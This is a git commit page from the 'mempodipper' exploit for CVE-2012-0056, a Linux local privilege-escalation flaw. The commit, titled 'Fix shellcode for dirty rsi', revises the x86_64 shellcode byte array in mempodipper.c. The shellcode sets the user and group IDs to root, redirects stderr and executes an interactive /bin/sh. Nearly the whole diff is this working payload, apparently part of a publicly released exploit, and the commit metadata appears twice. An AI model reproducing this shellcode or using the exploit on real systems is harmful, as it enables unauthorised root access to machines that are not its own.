Fix shellcode for dirty rsi.

author: Jason A. Donenfeld <Jason@zx2c4.com> 2012-01-24 06:22:53 +0100
committer: Jason A. Donenfeld <Jason@zx2c4.com> 2012-01-24 06:22:53 +0100
commit: 948714701ce5a27f560b34301c75ae31b468d477 (patch)
tree: 0b450d63a69ccc75c250834386d362e6aabaa0e9 /mempodipper.c
parent: Initial attempts at ptrace style resolving of symbols. (diff)
download: CVE-2012-0056-948714701ce5a27f560b34301c75ae31b468d477.tar.xz
CVE-2012-0056-948714701ce5a27f560b34301c75ae31b468d477.zip
1 files changed, 5 insertions, 6 deletions
diff --git a/mempodipper.c b/mempodipper.c
index fccc253..cc2a0fd 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -171,12 +171,11 @@ int main(int argc, char **argv)
 #elif defined(__x86_64__)
 		// See shellcode-64.s in this package for the source.
 		char shellcode[] =
-			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
-			"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
-			"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
-			"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
-			"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
-
+			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+			"\x31\xf6\x40\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+			"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+			"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+			"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
 #else
 #error "That platform is not supported."
 #endif
author	Jason A. Donenfeld <Jason@zx2c4.com>	2012-01-24 06:22:53 +0100
committer	Jason A. Donenfeld <Jason@zx2c4.com>	2012-01-24 06:22:53 +0100
commit	948714701ce5a27f560b34301c75ae31b468d477 (patch)
tree	0b450d63a69ccc75c250834386d362e6aabaa0e9 /mempodipper.c
parent	Initial attempts at ptrace style resolving of symbols. (diff)
download	CVE-2012-0056-948714701ce5a27f560b34301c75ae31b468d477.tar.xz CVE-2012-0056-948714701ce5a27f560b34301c75ae31b468d477.zip